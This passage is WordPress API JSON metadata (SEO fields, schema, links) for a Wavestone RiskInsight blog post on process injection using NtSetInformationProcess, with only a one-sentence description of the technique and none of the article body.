consultants\",\"publisher\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.riskinsight-wavestone.com\/en\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#organization\",\"name\":\"Wavestone\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png\",\"contentUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png\",\"width\":50,\"height\":50,\"caption\":\"Wavestone\"},\"image\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/4d873dfbd34bf516c111d70f13642c7c\",\"name\":\"Yoann DEQUEKER\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/author\/yoann-dequeker\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Process Injection using NtSetInformationProcess - RiskInsight","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/","og_locale":"en_US","og_type":"article","og_title":"Process Injection using NtSetInformationProcess - RiskInsight","og_description":"Process injection is a family of malware development techniques allowing an attacker to execute a malicious payload into legitimate addressable memory space of a legitimate process. These techniques are interesting because the malicious payload is executed by a legitimate process...","og_url":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/","og_site_name":"RiskInsight","article_published_time":"2023-10-02T09:19:04+00:00","article_modified_time":"2023-10-10T14:12:31+00:00","og_image":[{"width":1280,"height":853,"url":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg","type":"image\/jpeg"}],"author":"Yoann DEQUEKER","twitter_misc":{"Written by":"Yoann DEQUEKER","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#article","isPartOf":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/"},"author":{"name":"Yoann DEQUEKER","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/4d873dfbd34bf516c111d70f13642c7c"},"headline":"Process Injection using NtSetInformationProcess","datePublished":"2023-10-02T09:19:04+00:00","dateModified":"2023-10-10T14:12:31+00:00","mainEntityOfPage":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/"},"wordCount":1576,"commentCount":0,"publisher":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#organization"},"image":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage"},"thumbnailUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg","articleSection":["Cybersecurity &amp; Digital Trust","Deep-dive","Ethical Hacking &amp; Incident Response"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/","url":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/","name":"Process Injection using NtSetInformationProcess - RiskInsight","isPartOf":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage"},"image":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage"},"thumbnailUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg","datePublished":"2023-10-02T09:19:04+00:00","dateModified":"2023-10-10T14:12:31+00:00","breadcrumb":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage","url":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg","contentUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg","width":1280,"height":853,"caption":"Personnes travaillant avec des ordinateurs et du papier"},{"@type":"BreadcrumbList","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.riskinsight-wavestone.com\/en\/"},{"@type":"ListItem","position":2,"name":"Process Injection using NtSetInformationProcess"}]},{"@type":"WebSite","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#website","url":"https:\/\/www.riskinsight-wavestone.com\/en\/","name":"RiskInsight","description":"The cybersecurity &amp; digital trust blog by Wavestone&#039;s consultants","publisher":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.riskinsight-wavestone.com\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#organization","name":"Wavestone","url":"https:\/\/www.riskinsight-wavestone.com\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/","url":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png","contentUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png","width":50,"height":50,"caption":"Wavestone"},"image":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/4d873dfbd34bf516c111d70f13642c7c","name":"Yoann DEQUEKER","url":"https:\/\/www.riskinsight-wavestone.com\/en\/author\/yoann-dequeker\/"}]}},"_links":{"self":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts\/21481","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/users\/1453"}],"replies":[{"embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/comments?post=21481"}],"version-history":[{"count":18,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts\/21481\/revisions"}],"predecessor-version":[{"id":21542,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts\/21481\/revisions\/21542"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/media\/20951"}],"wp:attachment":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/media?parent=21481"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/categories?post=21481"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/tags?post=21481"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/coauthors?post=21481"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}